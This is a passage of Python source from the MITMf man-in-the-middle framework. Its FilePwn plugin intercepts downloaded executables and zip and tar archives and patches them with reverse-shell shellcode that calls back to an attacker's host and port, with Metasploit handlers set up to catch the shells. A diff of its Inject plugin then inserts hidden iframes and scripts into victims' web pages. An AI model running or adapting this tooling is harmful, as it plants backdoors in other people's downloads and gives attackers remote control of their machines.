||||||
t.setDaemon(True)
|
|
||||||
t.start()
|
|
||||||
|
|
||||||
def setupMSF(self):
|
|
||||||
msf = Msf()
|
|
||||||
for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
|
|
||||||
cmd = "use exploit/multi/handler\n"
|
|
||||||
cmd += "set payload {}\n".format(config["MSFPAYLOAD"])
|
|
||||||
cmd += "set LHOST {}\n".format(config["HOST"])
|
|
||||||
cmd += "set LPORT {}\n".format(config["PORT"])
|
|
||||||
cmd += "set ExitOnSession False\n"
|
|
||||||
cmd += "exploit -j\n"
|
|
||||||
|
|
||||||
pid = msf.findpid('multi/handler')
|
|
||||||
if pid:
|
|
||||||
info = msf.jobinfo(pid)
|
|
||||||
if (info['datastore']['payload'] == config["MSFPAYLOAD"]) and (info['datastore']['LPORT'] == config["PORT"]) and (info['datastore']['lhost'] != config['HOST']):
|
|
||||||
msf.killjob(pid)
|
|
||||||
msf.sendcommand(cmd)
|
|
||||||
else:
|
|
||||||
msf.sendcommand(cmd)
|
|
||||||
else:
|
|
||||||
msf.sendcommand(cmd)
|
|
||||||
|
|
||||||
def onConfigChange(self):
|
|
||||||
self.initialize(self.options)
|
|
||||||
|
|
||||||
def convert_to_Bool(self, aString):
|
|
||||||
if aString.lower() == 'true':
|
|
||||||
return True
|
|
||||||
elif aString.lower() == 'false':
|
|
||||||
return False
|
|
||||||
elif aString.lower() == 'none':
|
|
||||||
return None
|
|
||||||
|
|
||||||
def bytes_have_format(self, bytess, formatt):
|
|
||||||
number = self.magicNumbers[formatt]
|
|
||||||
if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']:
|
|
||||||
return True
|
|
||||||
return False
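
bytes_have_format() compares the response body against the signature string and offset stored in magicNumbers; a standalone illustration of the same check, with an abbreviated table and made-up sample data (not part of the plugin):

    MAGIC = {'pe':  ('MZ', 0),
             'elf': ('7f454c46'.decode('hex'), 0),
             'zip': ('504b0304'.decode('hex'), 0)}

    def looks_like(data, fmt):
        magic, offset = MAGIC[fmt]
        return data[offset:offset + len(magic)] == magic

    print looks_like('MZ\x90\x00', 'pe')     # True  - PE/COFF header
    print looks_like('PK\x03\x04', 'elf')    # False - that's the zip signature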
|
|
||||||
|
|
||||||
def binaryGrinder(self, binaryFile):
|
|
||||||
"""
|
|
||||||
Feed potential binaries into this function,
|
|
||||||
it will return the result PatchedBinary, False, or None
|
|
||||||
"""
|
|
||||||
|
|
||||||
with open(binaryFile, 'r+b') as f:
|
|
||||||
binaryTMPHandle = f.read()
|
|
||||||
|
|
||||||
binaryHeader = binaryTMPHandle[:4]
|
|
||||||
result = None
|
|
||||||
|
|
||||||
try:
|
|
||||||
if binaryHeader[:2] == 'MZ': # PE/COFF
|
|
||||||
pe = pefile.PE(data=binaryTMPHandle, fast_load=True)
|
|
||||||
magic = pe.OPTIONAL_HEADER.Magic
|
|
||||||
machineType = pe.FILE_HEADER.Machine
|
|
||||||
|
|
||||||
#update when supporting more than one arch
|
|
||||||
if (magic == int('20B', 16) and machineType == 0x8664 and
|
|
||||||
self.WindowsType.lower() in ['all', 'x64']):
|
|
||||||
add_section = False
|
|
||||||
cave_jumping = False
|
|
||||||
if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
|
|
||||||
add_section = True
|
|
||||||
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
|
|
||||||
cave_jumping = True
|
|
||||||
|
|
||||||
# if automatic override
|
|
||||||
if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
|
|
||||||
cave_jumping = True
|
|
||||||
|
|
||||||
targetFile = pebin.pebin(FILE=binaryFile,
|
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.WindowsIntelx64['SHELL'],
|
|
||||||
HOST=self.WindowsIntelx64['HOST'],
|
|
||||||
PORT=int(self.WindowsIntelx64['PORT']),
|
|
||||||
ADD_SECTION=add_section,
|
|
||||||
CAVE_JUMPING=cave_jumping,
|
|
||||||
IMAGE_TYPE=self.WindowsType,
|
|
||||||
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
|
|
||||||
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
|
|
||||||
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
|
|
||||||
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
|
|
||||||
)
|
|
||||||
|
|
||||||
result = targetFile.run_this()
|
|
||||||
|
|
||||||
elif (machineType == 0x14c and
|
|
||||||
self.WindowsType.lower() in ['all', 'x86']):
|
|
||||||
add_section = False
|
|
||||||
cave_jumping = False
|
|
||||||
#add_section wins for cave_jumping
|
|
||||||
#default is single for BDF
|
|
||||||
if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
|
|
||||||
add_section = True
|
|
||||||
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
|
|
||||||
cave_jumping = True
|
|
||||||
|
|
||||||
# if automatic override
|
|
||||||
if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
|
|
||||||
cave_jumping = True
|
|
||||||
|
|
||||||
targetFile = pebin.pebin(FILE=binaryFile,
|
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.WindowsIntelx86['SHELL'],
|
|
||||||
HOST=self.WindowsIntelx86['HOST'],
|
|
||||||
PORT=int(self.WindowsIntelx86['PORT']),
|
|
||||||
ADD_SECTION=add_section,
|
|
||||||
CAVE_JUMPING=cave_jumping,
|
|
||||||
IMAGE_TYPE=self.WindowsType,
|
|
||||||
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
|
|
||||||
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
|
|
||||||
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
|
|
||||||
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
|
|
||||||
)
|
|
||||||
|
|
||||||
result = targetFile.run_this()
|
|
||||||
|
|
||||||
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
|
|
||||||
|
|
||||||
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False)
|
|
||||||
targetFile.support_check()
|
|
||||||
|
|
||||||
if targetFile.class_type == 0x1:
|
|
||||||
#x86CPU Type
|
|
||||||
targetFile = elfbin.elfbin(FILE=binaryFile,
|
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.LinuxIntelx86['SHELL'],
|
|
||||||
HOST=self.LinuxIntelx86['HOST'],
|
|
||||||
PORT=int(self.LinuxIntelx86['PORT']),
|
|
||||||
SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'],
|
|
||||||
IMAGE_TYPE=self.LinuxType
|
|
||||||
)
|
|
||||||
result = targetFile.run_this()
|
|
||||||
elif targetFile.class_type == 0x2:
|
|
||||||
#x64
|
|
||||||
targetFile = elfbin.elfbin(FILE=binaryFile,
|
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.LinuxIntelx64['SHELL'],
|
|
||||||
HOST=self.LinuxIntelx64['HOST'],
|
|
||||||
PORT=int(self.LinuxIntelx64['PORT']),
|
|
||||||
SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'],
|
|
||||||
IMAGE_TYPE=self.LinuxType
|
|
||||||
)
|
|
||||||
result = targetFile.run_this()
|
|
||||||
|
|
||||||
elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
|
|
||||||
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
|
|
||||||
targetFile.support_check()
|
|
||||||
|
|
||||||
#ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
|
|
||||||
|
|
||||||
if targetFile.FAT_FILE is True:
|
|
||||||
if self.FatPriority == 'x86':
|
|
||||||
targetFile = machobin.machobin(FILE=binaryFile,
|
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.MachoIntelx86['SHELL'],
|
|
||||||
HOST=self.MachoIntelx86['HOST'],
|
|
||||||
PORT=int(self.MachoIntelx86['PORT']),
|
|
||||||
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
|
||||||
FAT_PRIORITY=self.FatPriority
|
|
||||||
)
|
|
||||||
result = targetFile.run_this()
|
|
||||||
|
|
||||||
elif self.FatPriority == 'x64':
|
|
||||||
targetFile = machobin.machobin(FILE=binaryFile,
|
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.MachoIntelx64['SHELL'],
|
|
||||||
HOST=self.MachoIntelx64['HOST'],
|
|
||||||
PORT=int(self.MachoIntelx64['PORT']),
|
|
||||||
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
|
||||||
FAT_PRIORITY=self.FatPriority
|
|
||||||
)
|
|
||||||
result = targetFile.run_this()
|
|
||||||
|
|
||||||
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
|
|
||||||
targetFile = machobin.machobin(FILE=binaryFile,
|
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.MachoIntelx86['SHELL'],
|
|
||||||
HOST=self.MachoIntelx86['HOST'],
|
|
||||||
PORT=int(self.MachoIntelx86['PORT']),
|
|
||||||
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
|
||||||
FAT_PRIORITY=self.FatPriority
|
|
||||||
)
|
|
||||||
result = targetFile.run_this()
|
|
||||||
|
|
||||||
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
|
|
||||||
targetFile = machobin.machobin(FILE=binaryFile,
|
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.MachoIntelx64['SHELL'],
|
|
||||||
HOST=self.MachoIntelx64['HOST'],
|
|
||||||
PORT=int(self.MachoIntelx64['PORT']),
|
|
||||||
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
|
||||||
FAT_PRIORITY=self.FatPriority
|
|
||||||
)
|
|
||||||
result = targetFile.run_this()
|
|
||||||
|
|
||||||
self.patched.put(result)
|
|
||||||
return
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
print 'Exception', str(e)
|
|
||||||
mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e))
|
|
||||||
return None
|
|
||||||
|
|
||||||
def tar_files(self, aTarFileBytes, formatt):
|
|
||||||
"When called will unpack and edit a Tar File and return a tar file"
|
|
||||||
|
|
||||||
print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB'
|
|
||||||
|
|
||||||
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
|
|
||||||
print "[!] TarFile over allowed size"
|
|
||||||
mitmf_logger.info("TarFIle maxSize met {}".format(len(aTarFileBytes)))
|
|
||||||
self.patched.put(aTarFileBytes)
|
|
||||||
return
|
|
||||||
|
|
||||||
with tempfile.NamedTemporaryFile() as tarFileStorage:
|
|
||||||
tarFileStorage.write(aTarFileBytes)
|
|
||||||
tarFileStorage.flush()
|
|
||||||
|
|
||||||
if not tarfile.is_tarfile(tarFileStorage.name):
|
|
||||||
print '[!] Not a tar file'
|
|
||||||
self.patched.put(aTarFileBytes)
|
|
||||||
return
|
|
||||||
|
|
||||||
compressionMode = ':'
|
|
||||||
if formatt == 'gz':
|
|
||||||
compressionMode = ':gz'
|
|
||||||
if formatt == 'bz':
|
|
||||||
compressionMode = ':bz2'
|
|
||||||
|
|
||||||
tarFile = None
|
|
||||||
try:
|
|
||||||
tarFileStorage.seek(0)
|
|
||||||
tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode)
|
|
||||||
except tarfile.ReadError:
|
|
||||||
pass
|
|
||||||
|
|
||||||
if tarFile is None:
|
|
||||||
print '[!] Not a tar file'
|
|
||||||
self.patched.put(aTarFileBytes)
|
|
||||||
return
|
|
||||||
|
|
||||||
print '[*] Tar file contents and info:'
|
|
||||||
print '[*] Compression:', formatt
|
|
||||||
|
|
||||||
members = tarFile.getmembers()
|
|
||||||
for info in members:
|
|
||||||
print "\t", info.name, info.mtime, info.size
|
|
||||||
|
|
||||||
newTarFileStorage = tempfile.NamedTemporaryFile()
|
|
||||||
newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage)
|
|
||||||
|
|
||||||
patchCount = 0
|
|
||||||
wasPatched = False
|
|
||||||
|
|
||||||
for info in members:
|
|
||||||
print "[*] >>> Next file in tarfile:", info.name
|
|
||||||
|
|
||||||
if not info.isfile():
|
|
||||||
print info.name, 'is not a file'
|
|
||||||
newTarFile.addfile(info, tarFile.extractfile(info))
|
|
||||||
continue
|
|
||||||
|
|
||||||
if info.size >= long(self.FileSizeMax):
|
|
||||||
print info.name, 'is too big'
|
|
||||||
newTarFile.addfile(info, tarFile.extractfile(info))
|
|
||||||
continue
|
|
||||||
|
|
||||||
# Check against keywords
|
|
||||||
keywordCheck = False
|
|
||||||
|
|
||||||
if type(self.tarblacklist) is str:
|
|
||||||
if self.tarblacklist.lower() in info.name.lower():
|
|
||||||
keywordCheck = True
|
|
||||||
|
|
||||||
else:
|
|
||||||
for keyword in self.tarblacklist:
|
|
||||||
if keyword.lower() in info.name.lower():
|
|
||||||
keywordCheck = True
|
|
||||||
continue
|
|
||||||
|
|
||||||
if keywordCheck is True:
|
|
||||||
print "[!] Tar blacklist enforced!"
|
|
||||||
mitmf_logger.info('Tar blacklist enforced on {}'.format(info.name))
|
|
||||||
continue
|
|
||||||
|
|
||||||
# Try to patch
|
|
||||||
extractedFile = tarFile.extractfile(info)
|
|
||||||
|
|
||||||
if patchCount >= int(self.userConfig['TAR']['patchCount']):
|
|
||||||
newTarFile.addfile(info, extractedFile)
|
|
||||||
else:
|
|
||||||
# create the file on disk temporarily for fileGrinder to run on it
|
|
||||||
with tempfile.NamedTemporaryFile() as tmp:
|
|
||||||
shutil.copyfileobj(extractedFile, tmp)
|
|
||||||
tmp.flush()
|
|
||||||
patchResult = self.binaryGrinder(tmp.name)
|
|
||||||
if patchResult:
|
|
||||||
patchCount += 1
|
|
||||||
file2 = "backdoored/" + os.path.basename(tmp.name)
|
|
||||||
print "[*] Patching complete, adding to tar file."
|
|
||||||
info.size = os.stat(file2).st_size
|
|
||||||
with open(file2, 'rb') as f:
|
|
||||||
newTarFile.addfile(info, f)
|
|
||||||
mitmf_logger.info("{} in tar patched, adding to tarfile".format(info.name))
|
|
||||||
os.remove(file2)
|
|
||||||
wasPatched = True
|
|
||||||
else:
|
|
||||||
print "[!] Patching failed"
|
|
||||||
with open(tmp.name, 'rb') as f:
|
|
||||||
newTarFile.addfile(info, f)
|
|
||||||
mitmf_logger.info("{} patching failed. Keeping original file in tar.".format(info.name))
|
|
||||||
if patchCount == int(self.userConfig['TAR']['patchCount']):
|
|
||||||
mitmf_logger.info("Met Tar config patchCount limit.")
|
|
||||||
|
|
||||||
# finalize the writing of the tar file first
|
|
||||||
newTarFile.close()
|
|
||||||
|
|
||||||
# then read the new tar file into memory
|
|
||||||
newTarFileStorage.seek(0)
|
|
||||||
ret = newTarFileStorage.read()
|
|
||||||
newTarFileStorage.close() # it's automatically deleted
|
|
||||||
|
|
||||||
if wasPatched is False:
|
|
||||||
# If nothing was changed return the original
|
|
||||||
print "[*] No files were patched forwarding original file"
|
|
||||||
self.patched.put(aTarFileBytes)
|
|
||||||
return
|
|
||||||
else:
|
|
||||||
self.patched.put(ret)
|
|
||||||
return
|
|
||||||
|
|
||||||
def zip_files(self, aZipFile):
|
|
||||||
"When called will unpack and edit a Zip File and return a zip file"
|
|
||||||
|
|
||||||
print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB'
|
|
||||||
|
|
||||||
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
|
|
||||||
print "[!] ZipFile over allowed size"
|
|
||||||
mitmf_logger.info("ZipFIle maxSize met {}".format(len(aZipFile)))
|
|
||||||
self.patched.put(aZipFile)
|
|
||||||
return
|
|
||||||
|
|
||||||
tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
|
|
||||||
tmpDir = '/tmp/' + tmpRan
|
|
||||||
tmpFile = '/tmp/' + tmpRan + '.zip'
|
|
||||||
|
|
||||||
os.mkdir(tmpDir)
|
|
||||||
|
|
||||||
with open(tmpFile, 'w') as f:
|
|
||||||
f.write(aZipFile)
|
|
||||||
|
|
||||||
zippyfile = zipfile.ZipFile(tmpFile, 'r')
|
|
||||||
|
|
||||||
#encryption test
|
|
||||||
try:
|
|
||||||
zippyfile.testzip()
|
|
||||||
|
|
||||||
except RuntimeError as e:
|
|
||||||
if 'encrypted' in str(e):
|
|
||||||
mitmf_logger.info('Encrypted zipfile found. Not patching.')
|
|
||||||
return aZipFile
|
|
||||||
|
|
||||||
print "[*] ZipFile contents and info:"
|
|
||||||
|
|
||||||
for info in zippyfile.infolist():
|
|
||||||
print "\t", info.filename, info.date_time, info.file_size
|
|
||||||
|
|
||||||
zippyfile.extractall(tmpDir)
|
|
||||||
|
|
||||||
patchCount = 0
|
|
||||||
|
|
||||||
wasPatched = False
|
|
||||||
|
|
||||||
for info in zippyfile.infolist():
|
|
||||||
print "[*] >>> Next file in zipfile:", info.filename
|
|
||||||
|
|
||||||
if os.path.isdir(tmpDir + '/' + info.filename) is True:
|
|
||||||
print info.filename, 'is a directory'
|
|
||||||
continue
|
|
||||||
|
|
||||||
#Check against keywords
|
|
||||||
keywordCheck = False
|
|
||||||
|
|
||||||
if type(self.zipblacklist) is str:
|
|
||||||
if self.zipblacklist.lower() in info.filename.lower():
|
|
||||||
keywordCheck = True
|
|
||||||
|
|
||||||
else:
|
|
||||||
for keyword in self.zipblacklist:
|
|
||||||
if keyword.lower() in info.filename.lower():
|
|
||||||
keywordCheck = True
|
|
||||||
continue
|
|
||||||
|
|
||||||
if keywordCheck is True:
|
|
||||||
print "[!] Zip blacklist enforced!"
|
|
||||||
mitmf_logger.info('Zip blacklist enforced on {}'.format(info.filename))
|
|
||||||
continue
|
|
||||||
|
|
||||||
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
|
|
||||||
|
|
||||||
if patchResult:
|
|
||||||
patchCount += 1
|
|
||||||
file2 = "backdoored/" + os.path.basename(info.filename)
|
|
||||||
print "[*] Patching complete, adding to zip file."
|
|
||||||
shutil.copyfile(file2, tmpDir + '/' + info.filename)
|
|
||||||
mitmf_logger.info("{} in zip patched, adding to zipfile".format(info.filename))
|
|
||||||
os.remove(file2)
|
|
||||||
wasPatched = True
|
|
||||||
else:
|
|
||||||
print "[!] Patching failed"
|
|
||||||
mitmf_logger.info("{} patching failed. Keeping original file in zip.".format(info.filename))
|
|
||||||
|
|
||||||
print '-' * 10
|
|
||||||
|
|
||||||
if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
|
|
||||||
mitmf_logger.info("Met Zip config patchCount limit.")
|
|
||||||
break
|
|
||||||
|
|
||||||
zippyfile.close()
|
|
||||||
|
|
||||||
zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)
|
|
||||||
|
|
||||||
print "[*] Writing to zipfile:", tmpFile
|
|
||||||
|
|
||||||
for base, dirs, files in os.walk(tmpDir):
|
|
||||||
for afile in files:
|
|
||||||
filename = os.path.join(base, afile)
|
|
||||||
print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '')
|
|
||||||
zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))
|
|
||||||
|
|
||||||
zipResult.close()
|
|
||||||
#clean up
|
|
||||||
shutil.rmtree(tmpDir)
|
|
||||||
|
|
||||||
with open(tmpFile, 'rb') as f:
|
|
||||||
tempZipFile = f.read()
|
|
||||||
os.remove(tmpFile)
|
|
||||||
|
|
||||||
if wasPatched is False:
|
|
||||||
print "[*] No files were patched forwarding original file"
|
|
||||||
self.patched.put(aZipFile)
|
|
||||||
return
|
|
||||||
else:
|
|
||||||
self.patched.put(tempZipFile)
|
|
||||||
return
|
|
||||||
|
|
||||||
def serverResponse(self, response, request, data):
|
|
||||||
|
|
||||||
content_header = response.headers['Content-Type']
|
|
||||||
client_ip = response.getClientIP()
|
|
||||||
|
|
||||||
if content_header in self.zipMimeTypes:
|
|
||||||
|
|
||||||
if self.bytes_have_format(data, 'zip'):
|
|
||||||
mitmf_logger.info("[FilePwn] {} Detected supported zip file type!".format(client_ip))
|
|
||||||
|
|
||||||
process = multiprocessing.Process(name='zip', target=self.zip_files, args=(data,))
|
|
||||||
process.daemon = True
|
|
||||||
process.start()
|
|
||||||
#process.join()
|
|
||||||
bd_zip = self.patched.get()
|
|
||||||
|
|
||||||
if bd_zip:
|
|
||||||
mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip))
|
|
||||||
return {'response': response, 'request': request, 'data': bd_zip}
|
|
||||||
|
|
||||||
else:
|
|
||||||
for tartype in ['gz','bz','tar']:
|
|
||||||
if self.bytes_have_format(data, tartype):
|
|
||||||
mitmf_logger.info("[FilePwn] {} Detected supported tar file type!".format(client_ip))
|
|
||||||
|
|
||||||
process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,))
|
|
||||||
process.daemon = True
|
|
||||||
process.start()
|
|
||||||
#process.join()
|
|
||||||
bd_tar = self.patched.get()
|
|
||||||
|
|
||||||
if bd_tar:
|
|
||||||
mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip))
|
|
||||||
return {'response': response, 'request': request, 'data': bd_tar}
|
|
||||||
|
|
||||||
|
|
||||||
elif content_header in self.binaryMimeTypes:
|
|
||||||
for bintype in ['pe','elf','fatfile','machox64','machox86']:
|
|
||||||
if self.bytes_have_format(data, bintype):
|
|
||||||
mitmf_logger.info("[FilePwn] {} Detected supported binary type ({})!".format(client_ip, bintype))
|
|
||||||
fd, tmpFile = mkstemp()
|
|
||||||
with open(tmpFile, 'w') as f:
|
|
||||||
f.write(data)
|
|
||||||
|
|
||||||
process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,))
|
|
||||||
process.daemon = True
|
|
||||||
process.start()
|
|
||||||
#process.join()
|
|
||||||
patchb = self.patched.get()
|
|
||||||
|
|
||||||
if patchb:
|
|
||||||
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
|
|
||||||
os.remove('./backdoored/' + os.path.basename(tmpFile))
|
|
||||||
mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip))
|
|
||||||
return {'response': response, 'request': request, 'data': bd_binary}
|
|
||||||
|
|
||||||
mitmf_logger.debug("[FilePwn] {} File is not of supported Content-Type: {}".format(client_ip, content_header))
|
|
||||||
return {'response': response, 'request': request, 'data': data}
|
|
|
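For reference, the zip path above is an unpack/patch/repack round trip done on disk under /tmp. A minimal in-memory sketch of the same idea using only the standard library (patch_member is a hypothetical stand-in for the per-file patching step, not a MITMf function):

import io
import zipfile

def patch_member(name, payload):
    # Hypothetical per-file transform; FilePwn would run its binary patcher here.
    return payload

def rewrite_zip(zip_bytes):
    # Read the original archive from memory, rewrite every member, return new bytes.
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(zip_bytes), 'r') as src:
        with zipfile.ZipFile(out, 'w', zipfile.ZIP_DEFLATED) as dst:
            for info in src.infolist():
                dst.writestr(info, patch_member(info.filename, src.read(info.filename)))
    return out.getvalue()

The on-disk approach in the plugin trades memory for simplicity; the sketch above avoids the temporary directory but is otherwise the same loop.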
@@ -1,5 +1,3 @@
-#!/usr/bin/env python2.7
-
 # Copyright (c) 2014-2016 Marcello Salvati
 #
 # This program is free software; you can redistribute it and/or
@@ -18,31 +16,31 @@
 # USA
 #
 
-import logging
 import time
 import re
 import sys
 import argparse
 
-from core.utils import SystemConfig
 from plugins.plugin import Plugin
-from plugins.CacheKill import CacheKill
 
-mitmf_logger = logging.getLogger("mitmf")
-
-class Inject(CacheKill, Plugin):
+class Inject(Plugin):
 
     name     = "Inject"
     optname  = "inject"
     desc     = "Inject arbitrary content into HTML content"
-    version  = "0.3"
-    has_opts = True
+    version  = "0.4"
 
     def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options = options
-       self.our_ip = SystemConfig.getIP(options.interface)
-       self.html_src = options.html_url
-       self.js_src = options.js_url
+       self.ip = options.ip
+       self.html_url = options.html_url
+       self.html_payload = options.html_payload
+       self.html_file = options.html_file
+       self.js_url = options.js_url
+       self.js_payload = options.js_payload
+       self.js_file = options.js_file
 
        self.rate_limit = options.rate_limit
        self.count_limit = options.count_limit
        self.per_domain = options.per_domain
@@ -50,33 +48,47 @@ class Inject(CacheKill, Plugin):
        self.white_ips = options.white_ips.split(',')
        self.white_domains = options.white_domains.split(',')
        self.black_domains = options.black_domains.split(',')
-       self.match_str = "</body>" or options.match_str
-       self.html_payload = options.html_payload
+       self.match_str = options.match_str
        self.ctable = {}
        self.dtable = {}
        self.count = 0
        self.mime = "text/html"
 
-       if not options.preserve_cache:
-           CacheKill.initialize(self, options)
-
-    def serverResponse(self, response, request, data):
-       #We throttle to only inject once every two seconds per client
-       #If you have MSF on another host, you may need to check prior to injection
-       #print "http://" + response.client.getRequestHostname() + response.uri
+    def response(self, response, request, data):
+
        ip, hn, mime = self._get_req_info(response)
-       if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and self._host_filter(hn) and (hn not in self.our_ip):
-           if (not self.js_src == self.html_src is not None or not self.html_payload == ""):
-               data = self._insert_html(data, post=[(self.match_str, self._get_payload())])
+       if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and self._host_filter(hn) and (hn not in self.ip):
+           if (not self.js_url == self.html_url is not None or not self.html_payload == ""):
+               data = self._insert_html(data, post=[(self.match_str, self.get_payload())])
                self.ctable[ip] = time.time()
                self.dtable[ip+hn] = True
                self.count += 1
-               mitmf_logger.info("{} [{}] Injected malicious html: {}".format(ip, self.name, hn))
+               self.clientlog.info("Injected malicious html: {}".format(hn), extra=request.clientInfo)
 
        return {'response': response, 'request':request, 'data': data}
 
-    def _get_payload(self):
-       return self._get_js() + self._get_iframe() + self.html_payload
+    def get_payload(self):
+       payload = ''
+
+       if self.html_url is not None:
+           payload += '<iframe src="{}" height=0%% width=0%%></iframe>'.format(self.html_url)
+
+       if self.html_payload is not None:
+           payload += self.html_payload
+
+       if self.html_file:
+           payload += self.html_file.read()
+
+       if self.js_url is not None:
+           payload += '<script type="text/javascript" src="{}"></script>'.format(self.js_url)
+
+       if self.js_payload is not None:
+           payload += '<script type="text/javascript">{}</script>'.format(self.js_payload)
+
+       if self.js_file:
+           payload += '<script type="text/javascript">{}</script>'.format(self.js_file.read())
+
+       return payload
 
     def _ip_filter(self, ip):
 
@@ -134,16 +146,6 @@ class Inject(CacheKill, Plugin):
        mime = response.headers['Content-Type']
        return (ip, hn, mime)
 
-    def _get_iframe(self):
-       if self.html_src is not None:
-           return '<iframe src="%s" height=0%% width=0%%></iframe>' % (self.html_src)
-       return ''
-
-    def _get_js(self):
-       if self.js_src is not None:
-           return '<script type="text/javascript" src="%s"></script>' % (self.js_src)
-       return ''
-
     def _insert_html(self, data, pre=[], post=[], re_flags=re.I):
        '''
        To use this function, simply pass a list of tuples of the form:
@@ -166,18 +168,20 @@ class Inject(CacheKill, Plugin):
 
        return data
 
-    def pluginOptions(self, options):
-       options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
-       options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
-       options.add_argument("--html-payload", type=str, default='', help="String you would like to inject.")
-       #options.add_argument("--html-file", type=argparse.FileType('r'), help='File containg HTML you would like to inject')
-       options.add_argument("--match-str", type=str, default=None, help="String you would like to match and place your payload before. (</body> by default)")
-       options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.")
+    def options(self, options):
+       options.add_argument("--js-url", type=str, help="URL of the JS to inject")
+       options.add_argument('--js-payload', type=str, help='JS string to inject')
+       options.add_argument('--js-file', type=argparse.FileType('r'), help='File containing JS to inject')
+       options.add_argument("--html-url", type=str, help="URL of the HTML to inject")
+       options.add_argument("--html-payload", type=str, help="HTML string to inject")
+       options.add_argument('--html-file', type=argparse.FileType('r'), help='File containing HTML to inject')
+       options.add_argument("--match-str", type=str, default='</body>', help="String you would like to match and place your payload before. (</body> by default)")
 
        group = options.add_mutually_exclusive_group(required=False)
-       group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.")
-       group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.")
-       group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.")
-       group.add_argument("--white-ips", metavar='IPS', type=str, default='', help="Inject content ONLY for these ips (comma seperated)")
-       group.add_argument("--black-ips", metavar='IPS', type=str, default='', help="DO NOT inject content for these ips (comma seperated)")
-       group.add_argument("--white-domains", metavar='DOMAINS', type=str, default='', help="Inject content ONLY for these domains (comma seperated)")
-       group.add_argument("--black-domains", metavar='DOMAINS', type=str, default='', help="DO NOT inject content for these domains (comma seperated)")
+       group.add_argument("--per-domain", action="store_true", help="Inject once per domain per client.")
+       group.add_argument("--rate-limit", type=float, help="Inject once every RATE_LIMIT seconds per client.")
+       group.add_argument("--count-limit", type=int, help="Inject only COUNT_LIMIT times per client.")
